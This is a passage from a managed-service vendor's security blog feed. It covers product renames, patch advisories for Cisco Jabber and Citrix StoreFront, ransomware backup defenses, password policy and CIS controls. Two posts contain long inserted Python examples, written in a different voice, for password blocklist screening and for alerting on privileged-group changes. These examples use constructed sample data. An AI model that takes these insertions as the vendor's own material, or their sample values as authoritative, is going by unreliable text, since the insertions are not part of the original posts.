For customer-specific environments where OneNeck provides managed services, OneNeck is monitoring for any additional updates from specific technology vendors to address potential threats. As updates are identified, OneNeck will follow appropriate communication and change protocols to get approval from customers to implement them. As noted previously, where customers leverage our recommended patching process, the specific protections related to patches recommended for the CVEs would already be in place. Where OneNeck provides additional security services such as Endpoint Detection and Response (via Cisco AMP for Endpoints), Next Generation Firewall (via Cisco Firepower) or Managed Detection and Response (via Alert Logic), we continue to work with these key vendors to implement the additional monitoring and protections they provide against new threats associated with the FireEye or SolarWinds breach.

Microsoft Combines & Renames Products Under Defender Brand
https://www.oneneck.com/blog/security/microsoft-renames-products-under-microsoft-defender-brand/
Tue, 17 Nov 2020 03:33:00 +0000

“What’s in a name? That which we call a rose by any other name would smell as sweet.” True, Juliet, but a name does matter, especially when it’s simply arbitrary versus describing what it actually is. And this seems to be a truth that Microsoft has taken to heart…

After rebranding Windows Defender as Microsoft Defender in early 2019, Microsoft announced in September that they are renaming and bringing more products under the Defender brand.

The Defender product line is now larger and split into two buckets:

  • Microsoft 365 Defender for end user environments: Microsoft 365 Defender delivers XDR (Extended Detection and Response) capabilities for identities, endpoints, cloud apps, email and documents. It uses artificial intelligence to reduce the SOC’s work items, and in a recent test we consolidated 1,000 alerts to just 40 high-priority incidents. Built-in self-healing technology fully automates remediation more than 70% of the time, ensuring defenders can focus on other tasks that better leverage their knowledge and expertise.
  • Azure Defender for cloud and hybrid infrastructure: Azure Defender delivers XDR capabilities to protect multi-cloud and hybrid workloads, including virtual machines, databases, containers, IoT, and more. Azure Defender is an evolution of the Azure Security Center threat protection capabilities and is accessed from within Azure Security Center.

The Microsoft 365 Defender line now includes:

  • Microsoft 365 Defender (previously Microsoft Threat Protection)
  • Microsoft Defender for Endpoint (previously Microsoft Defender Advanced Threat Protection)
  • Microsoft Defender for Office 365 (previously Office 365 Advanced Threat Protection)
  • Microsoft Defender for Identity (previously Azure Advanced Threat Protection)

The Azure Defender line now includes:

  • Azure Defender for Servers (previously Azure Security Center Standard Edition)
  • Azure Defender for IoT (previously Azure Security Center for IoT)
  • Azure Defender for SQL (previously Advanced Threat Protection for SQL)

This rebranding of Microsoft’s security offerings is in alignment with other product renaming initiatives (such as the renaming of the Office 365 SMB SKUs) that have taken place over the last year or so.

OneNeck Product Director, Jim Brown, states, “It just makes sense. As Microsoft is striving to simplify and unify their security offerings to cover an end-to-end security portfolio, the names need to reflect this strategy and enable clear consumption models and make it easier for organizations to understand how to use them to be more secure.”

We’ve Got Your Back.

As an experienced Cloud Solution Provider (CSP) and Microsoft partner, we’re here to help. So, if you have any questions regarding the new Microsoft product names and how to use them to secure your data and applications, let’s chat.

Your Windows version of Cisco Jabber poses a security risk
https://www.oneneck.com/blog/your-windows-version-of-cisco-jabber-could-be-a-security-risk/
Fri, 25 Sep 2020 01:37:00 +0000

On September 2nd, 2020, Cisco issued a Critical Security Advisory regarding Cisco Jabber for Windows that customers should be aware of. A vulnerability in Cisco Jabber for Windows could allow an authenticated, remote attacker to execute arbitrary code. Attackers could achieve remote code execution by sending specially crafted chat messages.

To exploit this vulnerability, an attacker must be able to send XMPP messages to end-user systems running Cisco Jabber for Windows. Attackers may require access to the same XMPP domain or another method of access to be able to send messages to clients.

The issue has the following identifier: CVE-2020-3495.

The vulnerability affects all currently supported versions of the Cisco Jabber client for Windows (12.1 – 12.9). Systems using Cisco Jabber in phone-only mode (without XMPP messaging services enabled) are not vulnerable to exploitation. There are no workarounds that address this vulnerability.

What Should You Do if Your Version of Jabber is Impacted?

Any customer running an affected version of Jabber should upgrade as soon as possible. The fixed releases are listed below:

  • Users operating version 12.1 should upgrade to 12.1.3
  • Users operating version 12.5 should upgrade to 12.5.2
  • Users operating version 12.6 should upgrade to 12.6.3
  • Users operating version 12.7 should upgrade to 12.7.2
  • Users operating version 12.8 should upgrade to 12.8.3
  • Users operating version 12.9 should upgrade to 12.9.1

The latest versions can be downloaded from the following URL:

https://software.cisco.com/download/home/284324806/type/284006014/release/

If this vulnerability applies to you, it’s time to update. If you have any questions or would like to talk to a OneNeck expert about Cisco Jabber, we are here to help.

Keep Moving Forward. We Got Your Back.

Is Your Citrix StoreFront Vulnerable to Exploit?
https://www.oneneck.com/blog/is-your-citrix-storefront-vulnerable-to-exploit/
Thu, 17 Sep 2020 21:51:00 +0000

On September 14, Citrix pushed out an announcement around a high-severity security vulnerability Citrix StoreFront customers should be aware of. An issue has been discovered in Citrix StoreFront (before 2006) that, if exploited, would allow an attacker who is authenticated on the same Microsoft Active Directory domain as a Citrix StoreFront server to read arbitrary files from that server.

This issue has the following identifier: CVE-2020-8200.

The issue affects the following supported Long Term Service Release (LTSR) versions of Citrix StoreFront:

  • Citrix StoreFront 1912 LTSR before CU1 (1912.0.1000)
  • Citrix StoreFront 3.12 for 7.15 LTSR before CU5 Hotfix (3.12.5001)
  • Citrix StoreFront 3.0 for 7.6 LTSR before CU8 Hotfix (3.0.8001)

Citrix StoreFront is included in deployments of Citrix Virtual Apps and Citrix Virtual Apps and Desktops as an infrastructure component; if you have Citrix Virtual Apps or Citrix Virtual Apps and Desktops, then you have Citrix StoreFront deployed in your environment today. Also, customers running Citrix Virtual Apps and Desktops 2003 should be aware that the version of Citrix StoreFront included in that release, 1912 LTSR, is one of the affected versions.

If users are not in the same Microsoft Active Directory domain as the Citrix StoreFront server, the vulnerability is not exploitable, even if the users are authenticated in a transitively trusted domain. Note that this applies even if the user is logged into the Citrix StoreFront server.

What Should You Do if Your Version of Citrix StoreFront is Impacted?

Citrix has addressed this issue in the following Citrix StoreFront versions:

  • Citrix StoreFront 1912 CU1 (1912.0.1000) and later versions of Citrix StoreFront 1912 LTSR
  • Citrix StoreFront 3.0 for 7.6 LTSR CU8 Hotfix (3.0.8001) and later versions of StoreFront 3.0 for 7.6 LTSR
  • Citrix StoreFront 3.12 for 7.15 LTSR CU5 Hotfix (3.12.5001) and later versions of StoreFront 3.12 for 7.15 LTSR

Any customers running an affected version of Citrix StoreFront, both CR and LTSR versions, should upgrade as soon as possible.

The latest versions of Citrix StoreFront can be downloaded from the following URLs:

Earlier this year, another Citrix vulnerability resulted in numerous compromised systems and hours of remediation work for organizations that were slow to fix it. Don’t let this happen to you. If this vulnerability applies to you, it’s time to update. If you have any questions or would like to talk to a OneNeck expert about your Citrix StoreFront, we are here to help.

Protecting Your Backups from Ransomware
https://www.oneneck.com/blog/security/are-your-backups-protected-from-ransomware/
Mon, 31 Aug 2020 19:45:00 +0000

Ransomware is at our doorstep. We cannot ignore it any longer or think we are not a target. In recent years at OneNeck, we have seen a significant upward trend of ransomware attacks. And even more troubling is in the last year, we have seen bad actors getting smarter, and they are now targeting your backup server and backup data to prevent you from recovering from the attack. As ZDNet stated, “The number of ransomware strains targeting NAS and backup storage devices is growing, with users ‘unprepared’ for the threat.”

In response, the backup industry has replied with some key recommendations you can implement to make it more difficult for those bad actors to be successful. Below are some of the recommendations being made by the industry and what we at OneNeck have seen be successful in slowing and reducing the risk of ransomware infecting your backup infrastructure:

  1. Remove your backup servers from the domain.

The goal of this recommendation is to prevent a compromised domain account with privileged access from leapfrogging from server to server until the attacker gains full management access to your backup infrastructure. This is a great first step and, depending on your backup infrastructure, it could be sufficient to keep those bad actors from gaining access to that data.

  2. Implement multi-factor authentication (MFA) on your backup servers.

Preventing the bad actors from accessing your backup management software is the goal of this recommendation. Removing all other management consoles from admin desktops and using a dedicated backup management server with multi-factor authentication makes it more difficult for bad actors to gain access to your backup infrastructure.

  3. Create an isolated network and control who can access it.

If your backup servers and repositories are on the same network as your production servers and data, it is not difficult for the bad actors to jump from a compromised server and reach your backup infrastructure via the network. A separate network makes it easier to create access control lists and prevent certain types of traffic from reaching your backup infrastructure. You can also lock down which devices have access to that separated network, making it more difficult for the bad actors to gain access and wreak havoc.

  4. Send a third copy of your backup data into object storage.

Object storage changes the way data is written and rewritten in your backup repositories. By its nature, ransomware wants to read and then overwrite or append to the original file to encrypt it. Object storage by design only allows create and delete operations, which makes it more difficult for ransomware to encrypt an object store.

  5. Implement an air-gapped backup repository.

This is the panacea for keeping your backup environment protected, but it does require the most cost and complexity. The goal of an air-gapped backup repository is to keep the backup copy and infrastructure offline from the production network; it is only online for a short period to pull the latest data copy and scan it for ransomware. Managing the air-gapped backup equipment takes physical access, which is extremely difficult for those bad actors.

To learn more about air-gapped backups, watch this webinar.

OneNeck would be happy to open the conversation to discuss how these preventative measures can be implemented in your environment to better protect your backup infrastructure. OneNeck can also help with an offensive approach to ransomware and business continuity. Backups always provide a good defense, but any good game plan has both an offensive and defensive component.

Keep Moving Forward. We Got Your Back(up).

Digging Deep into the Dark Web for User Credentials
https://www.oneneck.com/blog/security/secure-data-from-dark-web/
Tue, 18 Aug 2020 20:36:00 +0000

We’ve all heard of the dark web, but most law-abiding people don’t give it much thought, as we chalk it up to the place shady people go to do shady things. But the truth is that today’s data-driven organizations can no longer ignore the dark web and the possibility that their customer and employee data could be out there with a for-sale sign.


As OneNeck security expert, Kevin Holestine, recently put it, “If someone wanted to buy your compromised customer or employee data, then the dark web is where they’d go. Which is what makes dark web scans a good practice for identifying if your data or accounts have been breached, for whatever reason, without your security tools alerting you.”

Compromised credentials are a hot-ticket item on the dark web, and in malicious hands, can bring devastating consequences to an organization. By adding a dark web scan to the detection toolkit, as well as stringent password policies, it’s possible to stop attacks before they happen.

As a secure managed services provider, we know that security best practices are key to ensuring we don’t miss anything, one being the password guidance on digital identity set out by the National Institute of Standards and Technology (NIST). NIST is a non-regulatory federal agency that operates under the Department of Commerce, and it develops information security standards and guidelines that establish the minimum requirements for federal systems – a great set of guidelines for non-government organizations as well. And in an effort to continuously evolve as security strategies evolve, the NIST password guidelines were recently updated to be more user friendly, and by user friendly we mean less complex, easier to remember, but harder to guess.

So, what are the new NIST guidelines for passwords?

  • Passwords must be at least 8 characters long, and systems must accept passwords of at least 64 characters to support the use of passphrases.
  • Do not impose other composition rules such as requiring special characters, upper- and lower-case characters, and at least one number, but allow their use.
  • When establishing or changing passwords, compare prospective passwords against a list of banned passwords that includes:
    • Passwords with sequential and repetitive characters (e.g. 12345 or aaaaaa).
    • Context-specific passwords (e.g. the name of the site, etc.).
    • Commonly used passwords (e.g. p@ssw0rd, etc.) and dictionary words.
    • Passwords obtained from previous breach corpuses.
  • No longer require periodic password changes, but force a password change if there is evidence of a compromise.
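The guidelines above describe a screening policy rather than composition rules. As an added example (my own code, not OneNeck’s or NIST’s), the Python below implements that list end to end: the 8-character minimum, acceptance of long passphrases (the 128-character cap is an assumed value; NIST only requires that at least 64 characters be allowed), no composition rules at all, and a blocklist covering repetitive and sequential characters, context-specific strings such as the site or user name, common passwords and dictionary words, and a breach corpus. The four-character run threshold, the word lists and the breach-corpus entries are constructed sample values, not real lists.

```python
"""NIST SP 800-63B-style password screening: a length rule plus blocklist checks, no composition rules."""
import hashlib
import re
import unicodedata

MIN_LENGTH = 8
# NIST requires that at least 64 characters be *allowed*; the 128 cap is an assumption for this example.
MAX_LENGTH = 128
# A character repeated this many times, or this many sequential characters, is rejected (assumed threshold).
MAX_RUN = 4

# Constructed sample lists. A real deployment loads far larger lists and a real breach corpus.
COMMON_PASSWORDS = {"password", "p@ssw0rd", "qwerty", "letmein", "welcome1", "iloveyou"}
DICTIONARY_WORDS = {"football", "sunshine", "dragon", "monkey", "baseball"}


def _sha256(text: str) -> str:
    return hashlib.sha256(text.encode("utf-8")).hexdigest()


# Breach-corpus entries are stored hashed so the blocklist itself holds no plaintext passwords.
BREACHED_HASHES = {_sha256(p) for p in ("Summer2019!", "hunter2hunter2", "Tr0ub4dor&3")}


def normalize(password: str) -> str:
    """Apply NFKC normalization first so visually identical inputs compare equal."""
    return unicodedata.normalize("NFKC", password)


def has_repetition(password: str, run: int = MAX_RUN) -> bool:
    """True for runs of one repeated character such as 'aaaa' (case-insensitive)."""
    return re.search(r"(.)\1{%d,}" % (run - 1), password.lower()) is not None


def has_sequence(password: str, run: int = MAX_RUN) -> bool:
    """True for ascending or descending runs of digits or letters such as '1234' or 'dcba'."""
    s = password.lower()
    for i in range(len(s) - run + 1):
        window = s[i:i + run]
        if not (window.isdigit() or window.isalpha()):
            continue
        deltas = {ord(b) - ord(a) for a, b in zip(window, window[1:])}
        if deltas == {1} or deltas == {-1}:
            return True
    return False


def evaluate_password(password: str, context: tuple = ()) -> list:
    """Return the blocklist reasons that apply; an empty list means the password is acceptable.

    `context` holds site-, organisation- or user-specific strings (site name, username)
    that must not appear inside the password.
    """
    pw = normalize(password)
    reasons = []
    if len(pw) < MIN_LENGTH or len(pw) > MAX_LENGTH:
        reasons.append("length")
    if has_repetition(pw):
        reasons.append("repetitive")
    if has_sequence(pw):
        reasons.append("sequential")
    lowered = pw.lower()
    if any(token.lower() in lowered for token in context if token):
        reasons.append("context")
    # Strip digits and symbols so 'football1!' is still caught as the dictionary word 'football'.
    letters_only = re.sub(r"[^a-z]", "", lowered)
    if lowered in COMMON_PASSWORDS or letters_only in DICTIONARY_WORDS:
        reasons.append("common")
    if _sha256(pw) in BREACHED_HASHES:
        reasons.append("breached")
    return reasons


if __name__ == "__main__":
    for candidate in ("correct horse battery staple", "12345678", "p@ssw0rd",
                      "Summer2019!", "OneNeck2024!"):
        verdict = evaluate_password(candidate, context=("oneneck", "jdoe"))
        print(f"{candidate!r}: {'accepted' if not verdict else 'rejected: ' + ', '.join(verdict)}")
```

Note that the only hard rule is length; every other check is a blocklist lookup, which is exactly the shift NIST made away from “one upper, one digit, one symbol”. Storing the breach corpus as digests keeps plaintext out of the blocklist, and returning the reason list lets the user interface explain why a candidate was refused without leaking the corpus itself.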

When it comes to credentials on the dark web, Kevin specifically refers to the last NIST guideline above – force a password change if there is evidence of a compromise. 

“Credentials from previous breach corpuses are obtained from the dark web and end up on banned password lists, which ostensibly triggers a password change request as per the NIST guidance. But the window of time that exists between a breach and the emergence of stolen credentials is not insignificant, nor are security tools in place to protect from and detect breaches guaranteed to be 100% effective 100% of the time. This is why dark web monitoring can be a very useful tool for security teams in that it serves as a form of out-of-band breach detection by alerting you when conventional tools may have failed or when a breach occurs via a vector out of your control, such as the compromise of an employee’s personal credentials that lead to the compromise of their corporate credentials.”

In addition to following best practices for password security, a great place to start to ensure your credentials are safe is with a dark web scan. If you’re interested in a dark web scan, we are here to help. Find out if your information is out there before it ends up in the wrong hands.

IT Security Processes | Anatomy of Ransomware
https://www.oneneck.com/blog/security/anatomy-of-ransomware-and-it-security-processes/
Tue, 28 Jul 2020 20:10:00 +0000

Ransomware is a type of malware that threat actors use to infect computers and encrypt computer files until a ransom is paid. After the initial infection, ransomware will attempt to spread to as many connected systems as possible, including file systems and other accessible systems on a business’s network.

To avoid becoming a ransomware victim, businesses should take actions that include putting security processes in place to ensure your IT environment is fully protected. Leveraging the Center for Internet Security’s (CIS) Critical Security Controls (CSC) is a solid place to start. These same security processes will help protect your critical business environment from malware, which accounts for nearly 30% of all breaches, according to Verizon’s 2019 Data Breach Investigations Report. In addition, the evaluation portion of the CSC is included with OneNeck’s virtual CISO (vCISO) service.

Mitigating contact with malicious web sites and emails.

Typically, the initiating step of a security breach is attributed to end users, where they have visited a malicious web site or acted unknowingly on a malicious email. There are several key security processes that can mitigate this initiating event:

  • Implement a Security Awareness and Training Program (CSC Control #17). This includes training the workforce on how to identify different forms of social engineering attacks (e.g., phishing, phone scams and impersonation calls). Educate your workforce to:
    • Use caution with links and when entering website addresses.
    • Check a website’s security (look for the lock) to ensure the information you submit is encrypted before you provide it.
    • Know email senders.
    • Open email attachments with caution.
  • Continuous Vulnerability Management (CSC Control #3). Deploy automated software update tools in order to ensure the operating systems are running the most recent security updates provided by the software vendor. Typically, the malware—and therefore attackers—are going to leverage a known vulnerability in an operating system to gain access or take control of a system.
  • Malware Defenses (CSC Control #8). Endpoint protection needs to be implemented on all workstations and servers. Advanced Threat Protection can detect, stop the movement of, or control the execution of malicious software. Additionally, it is best for it to be centrally managed to ensure:
    • Endpoint software is at current versions.
    • It is scanning appropriately.
    • A notification process is in place for when the Advanced Threat Protection detects and takes action.
    • Quarantined files are handled properly.

If malware takes hold, defenses that can help.

If the malware is successful in taking hold in your IT environment, there are several defenses that can help prevent the malware from evolving into a full-scale ransomware event:

  • Boundary Defense (CSC Control #12). The primary device involved is your firewall; however, just as critical are the features you enable (IDS/IPS), the architecture (DMZs, segmentation), the configuration you’ve implemented (filters on outbound traffic), and regular scans of your firewall to assure you’re only allowing what you intend. When malware is installed it typically wants to talk to a bad actor outside your network; therefore, if your firewall is configured properly, it can prevent the malware from connecting back to the bad actor.
  • Controlled Use of Administrative Privileges (CSC Control #4). Configure systems to issue a log entry and alert when an account is added to or removed from any group assigned administrative privileges. One of the primary goals of malware is to gain full access to your environment, and the best way to do that is for the bad actor to compromise a privileged account, such as Domain Admin.
  • Monitoring/Logging (CSC Control #6). Ensure appropriate logs are being aggregated to a central log management system for analysis and that they are being reviewed. Poor or nonexistent log analysis processes can allow attackers to control victim machines for months or years without anyone in the target organization knowing, even though the evidence of the attack is being recorded—in unexamined log files.
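Controls #4 and #6 above call for an alert whenever an account enters or leaves an administrative group, and for that alert to come out of centrally collected logs that someone actually reviews. As an added example (not from the post, from CIS or from Microsoft), the Python below runs that detection over a few constructed Windows Security log records forwarded as JSON lines. The event IDs are the real Windows IDs for membership changes in security-enabled groups (4728/4732/4756 for additions to global/local/universal groups, 4729/4733/4757 for removals); the host names, account names, timestamps, the privileged-group list and the 24-hour window used to spot “granted, used, quietly removed” memberships are assumptions.

```python
"""Alert on membership changes to privileged groups (CSC #4) from centrally collected logs (CSC #6)."""
import json
from datetime import datetime, timedelta

# Groups whose membership changes always warrant an alert (assumed list; tailor it to your directory).
PRIVILEGED_GROUPS = {"Domain Admins", "Enterprise Admins", "Schema Admins",
                     "Administrators", "Backup Operators"}

# Real Windows Security event IDs: member added to / removed from a security-enabled group.
ADD_EVENTS = {4728: "global", 4732: "local", 4756: "universal"}
REMOVE_EVENTS = {4729: "global", 4733: "local", 4757: "universal"}

# Constructed sample records, one JSON object per line, as a log shipper might forward them.
# Hosts, accounts and times are invented; only the event IDs are real.
SAMPLE_LOG = """\
{"time": "2020-07-20T02:13:05Z", "event_id": 4728, "host": "DC01", "group": "Domain Admins", "member": "svc-backup", "actor": "jsmith"}
{"time": "2020-07-20T02:13:40Z", "event_id": 4720, "host": "DC01", "target": "tmpuser", "actor": "jsmith"}
{"time": "2020-07-20T09:15:00Z", "event_id": 4732, "host": "FS02", "group": "Administrators", "member": "tmpuser", "actor": "jsmith"}
{"time": "2020-07-20T09:30:00Z", "event_id": 4728, "host": "DC01", "group": "Marketing", "member": "ajones", "actor": "hr-admin"}
{"time": "2020-07-20T17:45:12Z", "event_id": 4729, "host": "DC01", "group": "Domain Admins", "member": "svc-backup", "actor": "jsmith"}
"""


def _ts(value: str) -> datetime:
    return datetime.strptime(value, "%Y-%m-%dT%H:%M:%SZ")


def parse_events(text: str) -> list:
    """Parse JSON-lines log text into event dicts, oldest first."""
    events = [json.loads(line) for line in text.splitlines() if line.strip()]
    return sorted(events, key=lambda ev: _ts(ev["time"]))


def detect_privileged_group_changes(events: list) -> list:
    """Return one alert per add/remove event that touches a privileged group."""
    alerts = []
    for ev in events:
        event_id = ev.get("event_id")
        if event_id in ADD_EVENTS:
            action, scope = "added to", ADD_EVENTS[event_id]
        elif event_id in REMOVE_EVENTS:
            action, scope = "removed from", REMOVE_EVENTS[event_id]
        else:
            continue  # not a group-membership event
        if ev.get("group") not in PRIVILEGED_GROUPS:
            continue  # change to a non-privileged group: keep the log entry, do not page anyone
        alerts.append({
            "time": ev["time"], "event_id": event_id, "host": ev["host"],
            "group": ev["group"], "member": ev["member"], "actor": ev["actor"],
            "action": action, "scope": scope,
        })
    return alerts


def find_transient_privilege(alerts: list, window_hours: float = 24.0) -> list:
    """Pair each add with its matching remove; flag memberships held no longer than the window.

    A short-lived admin membership is a classic sign of someone granting rights for one
    task and cleaning up afterwards; it only surfaces when the logs are actually reviewed.
    """
    window = timedelta(hours=window_hours)
    pending = {}
    findings = []
    for alert in alerts:  # alerts are already in time order
        key = (alert["group"], alert["member"])
        if alert["action"] == "added to":
            pending[key] = alert
        elif key in pending:
            added = pending.pop(key)
            held_for = _ts(alert["time"]) - _ts(added["time"])
            if held_for <= window:
                findings.append({"group": key[0], "member": key[1],
                                 "added_by": added["actor"], "removed_by": alert["actor"],
                                 "held_for": held_for})
    return findings


if __name__ == "__main__":
    alerts = detect_privileged_group_changes(parse_events(SAMPLE_LOG))
    for a in alerts:
        print(f"ALERT {a['time']} {a['host']} event {a['event_id']}: {a['member']} "
              f"{a['action']} {a['scope']} group '{a['group']}' by {a['actor']}")
    for f in find_transient_privilege(alerts):
        print(f"REVIEW: {f['member']} held '{f['group']}' for only {f['held_for']} "
              f"(added by {f['added_by']}, removed by {f['removed_by']})")
```

Run on the sample, the first function raises three alerts (the Domain Admins add and remove, and the local Administrators add on FS02) while ignoring the Marketing group change and the unrelated account-creation event; the second function pairs the add and remove and reports that the service account held Domain Admins for about fifteen and a half hours, which is the kind of pattern that a ticket queue never shows you and only log review does.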

If the worst happens—and you are prepared—you still do NOT have to pay the ransom.

If the bad actor has taken hold, it’s not good—but all is NOT lost. While it’s likely the bad actor has gained access to a privileged account in the environment and your critical data is at risk, at this point, you can still minimize the impact.

  • Incident Response and Management (CSC Control #19). This control covers quickly discovering an attack, effectively containing the damage, eradicating the attacker’s presence and restoring the integrity of the network and systems. This is a critical step—ensuring you inspect your entire environment for any movement the bad actors might have made. Otherwise, if you just move to recovering your environment, the bad actor will return quickly.
  • Data Recovery Capabilities (CSC Control #10). Ensure each of the organization’s key systems is backed up as a complete system to enable the quick recovery of an entire system. The challenge with ransomware is that if the initiating event took place weeks or months earlier, your backup data may already be suspect. This is precisely why, when implementing your backup systems, you have to ensure all backups have at least one backup destination that is not continuously addressable through operating system calls, so that the ransomware can’t directly encrypt files.

Typically, there are several events that happen over the course of days, weeks or months that ultimately result in a ransomware attack. While there are a wide number of variants for ransomware, most events follow the path laid out above. Every step in the process could be identified and addressed. It can be a long journey, but you don’t have to go it alone. Through partnership with OneNeck’s vCISO service, the CSC will be leveraged to help assure your IT environment is protected.

Your Remote Workplace is More of an Activity than a Place
https://www.oneneck.com/blog/security/work-is-an-activity-not-a-place/
Wed, 08 Jul 2020 19:00:00 +0000

Recent months have seen a massive shift towards supporting remote workers, which in turn has created a series of security challenges. IT teams are now not only tasked with quickly providing support for a never-before-seen number of offsite workers and their devices, but they must do it without compromising security – no small task.

Secure Your Remote Workers with OneNeck + Cisco

Taking into account this new reality, you need a straightforward way to secure remote workers at the speed and the scale of your business. The Cisco Secure Remote Worker solution unifies user and device protection at scale, making it easy to verify users, enable secure access and defend remote workers at any time from anywhere. This integrated solution helps accelerate your business success with security that works together, delivering the power of Cisco Duo, AnyConnect, Umbrella and AMP for Endpoints.

  • Cisco Duo verifies the identity of all users before granting access to corporate applications.
  • Cisco AnyConnect enables secure access to the enterprise network for any user, from any device, at any time, in any location.
  • Cisco Umbrella provides the first line of defense against threats on the Internet wherever users go.
  • Cisco AMP for Endpoints provides the last line of defense, enabling protection, detection and response on the endpoint against known and unknown threats.

Just how do all of these pieces work together? Check out this quick video.


If you’re looking to increase productivity and protection for your remote employees, we can help with a scalable and integrated security solution that delivers the strength and breadth of Cisco’s security approach with the power of Cisco Duo, AnyConnect, Umbrella and AMP for Endpoints.


Considerations When Securing a Remote Workforce
https://www.oneneck.com/blog/security/it-considerations-when-securing-a-remote-workforce-coworkers-data/
Wed, 01 Apr 2020 00:00:00 +0000

As today’s IT teams are scrambling to figure out the logistics of helping their coworkers be productive from their home offices, it’s important to remember that security can’t be an afterthought. Enabling employees to work remotely has only broadened the landscape for attackers, giving them even more opportunity to find a way into your organization.

As OneNeck CISO, Katie McCullough put it, “Cybercriminals are opportunists, and they know it’s a confusing time for everybody, that people are looking for information through all means possible. They also know companies are having to react quickly and may have unintended consequences for the configurations they put in place. Our boundaries to our corporate networks are expanding with so much work from home. Now more than ever security must be front and center.”

So, what is an IT leader to do to keep your workforce safe, no matter where they might be sitting? I sat down with Katie last week, as she sat in her own home, to get her perspective on some basic steps that will help keep the attackers at bay.

The impact the pandemic is having on IT security…

Question 1: In light of the current pandemic, what are you seeing as the impact it’s having on the security environment, and how is this being exploited by attackers?

[Video response]

How to keep your workers and data safe during a time of crisis…

Question 2: They say many devices, many risks, and we’ve got a lot of people in the remote workforce these days. What recommendations would you have for IT leaders to keep their teams safe as they’re remote?

[Embedded video answer]

Question 3: It’s a known fact that end users pose the greatest risk to today’s organization. What recommendations do you have to mitigate this risk with a remote workforce?

[Embedded video answer]

Question 4: I’ve heard you say many times over the past several years that one of the most critical aspects of data security is a simple one – regular patching. How are customers dealing with patching during this time?

[Embedded video answer]

Question 5: One of the Critical Security Controls we often reference is around privileged account access. I’d imagine this is a key consideration during this time?

[Embedded video answer]

Question 6: The OneNeck workforce is no exception during this time, as we’re all working remote right now. However, we still have a lot of engineers out there in the field working around the clock to help customers adapt to a remote workforce. What kinds of security services can we currently offer our customers to help them with these remote workforce challenges?

[Embedded video answer]

In Summary

Now more than ever, we want our customers to know we’re here to help. Whether you need help implementing multi-factor authentication (MFA) or encrypted connections, ensuring proper email configurations or web safeguards, or, if the worst happens, responding to an incident, we are here to help.

We may be working in isolation, but it’s people and interaction that powers business. And we’re here to help keep your remote workforce interactions safe.

Keep moving forward. We got your back.

Time for a next-gen firewall? https://www.oneneck.com/blog/time-for-a-next-gen-firewall/ Mon, 23 Dec 2019 21:00:00 +0000

Long ago, in a land far away, there used to be a network perimeter. Those were the good old days where the network perimeter was the all-encompassing traffic control point, and where traffic was all funneled through a single point, no matter where it came from. But the cloud changed everything by decentralizing the network, making the perimeter vaporize, and giving IT many a sleepless night.

OneNeck Security Practice Director, Nick Santilli, describes the situation like this. “The largest cybersecurity threat still revolves around end users. As technology has evolved, we now have our phones, our tablets – we can work from anywhere on just about any device. And so, the security perimeter has expanded from being just at an office or company location to Starbucks or the movie theater, or even a beach – it’s wherever I am with my device.”

So, with the lack of one point of protection, today’s security teams are having to adapt to protecting multiple points (aka micro-perimeters) across a complex and dispersed environment. And just as IT is evolving its approach, traditional firewalls are evolving too, being replaced by a mixture of physical and virtual appliances, some embedded into the network while others are delivered as a service, are host-based, or are included with public cloud environments.

What Should I Look for in a Next-gen Firewall?

While threats continue to get more complex, many organizations are still using yesterday’s firewall. So, what should you consider when updating your firewall technology? Cisco lays out these five tips when choosing your next-gen firewall:

  • Does it deliver breach prevention and advanced security? Clearly, breach prevention is a firewall’s primary job, but it also should quickly detect a breach should malware make its way inside.
  • Does it give you visibility across the network? The first rule of detection is being able to see what’s out there. So your firewall should give you a holistic view and contextual awareness.
  • Does it come with flexible management and deployment options? A firewall does no good if it’s too complex to deploy, not easily managed, and cannot be customized to meet your environment’s unique needs, making this a critical consideration.
  • Does it detect threats fast enough to mitigate risk? With many of today’s high-profile breaches, it’s discovered later that they’ve been in their network for 100+ days, which is truly terrifying to any security professional. Speed to detection is a must in a modern firewall.
  • Does it play well with others? Like any component of a solid security strategy, it has to be integrated with other security components to truly be effective. The automated sharing of threat information, event data, policy and contextual information is what leads to a solution that can secure an environment across multiple points.

The Network Security Game is Changing

Network security in general is becoming more complex on a daily basis, and this requires new strategies to keep the network safe from attack. Point tools, manual processes and a lack of qualified staff are only making it harder for today’s CISO to stay ahead of threats. But with integrated technology, consistent network security policies and automation, there is hope. Interested in learning more? Check out this informative ESG research report, Navigating Network Security Complexity.

You’re Not Alone.

Still not sure where to start? At OneNeck, we recognize that organizations often need support evolving their security programs, but they don’t have unlimited resources — or in many cases, a chief information security officer (CISO) — to accomplish this important goal. To address this gap, we offer our Virtual CISO service to provide you with on-demand strategic and operational support to meet your unique security needs, without the time delays and high cost of hiring a full-time security expert.

“We stay up to date on the latest security threats, so you don’t have to,” says OneNeck’s CISO, Katie McCullough. “If cybersecurity strategy and risk assessments are a core competency of yours, that’s great. But if not, we can stand in the gap and help you create a security program that accomplishes what you need, without over-engineering systems or processes.”

So, hang in there. You’re not alone. We’re here to help, wherever you are in your security journey.

How Much Risk is Too Much? https://www.oneneck.com/blog/how-much-risk-is-too-much/ Wed, 06 Nov 2019 21:00:00 +0000

For a long time, security initiatives have been driven by compliance mandates and a healthy dose of fear. But as threats continue to become more sophisticated, so must our efforts in thwarting them. This is why aligning with best practices is a great place to start, specifically the Center for Internet Security (CIS) Top 20 Critical Security Controls, which were developed by a global group of security experts who continue to fine-tune them every year.

The 20 critical controls are divided into three categories: Basic, Foundational, and Organizational.

  • Basic controls (1–6) are the must-have measures for the most basic defense readiness.
  • Foundational controls (7–16) are a level beyond the basic controls.
  • Organizational controls (17–20) focus more on people and processes.

[Figure: CIS Controls]

The CIS further outlines in the CIS Controls v7.1 that an effective approach to cybersecurity can be approached with these steps:

  • Offense informs defense: Use knowledge of actual attacks that have compromised systems to provide the foundation to continually learn from these events to build effective, practical defenses. Include only those controls that can be shown to stop known real-world attacks.
  • Prioritization: Invest first in Controls that will provide the greatest risk reduction and protection against the most dangerous threat actors and that can be feasibly implemented in your computing environment.
  • Measurements and Metrics: Establish common metrics to provide a shared language for executives, IT specialists, auditors, and security officials to measure the effectiveness of security measures within an organization so that required adjustments can be identified and implemented quickly.
  • Continuous diagnostics and mitigation: Carry out continuous measurement to test and validate the effectiveness of current security measures and to help drive the priority of next steps.
  • Automation: Automate defenses so that organizations can achieve reliable, scalable, and continuous measurements of their adherence to the Controls and related metrics.

It’s Time to Move to a Risk Management Approach to Security

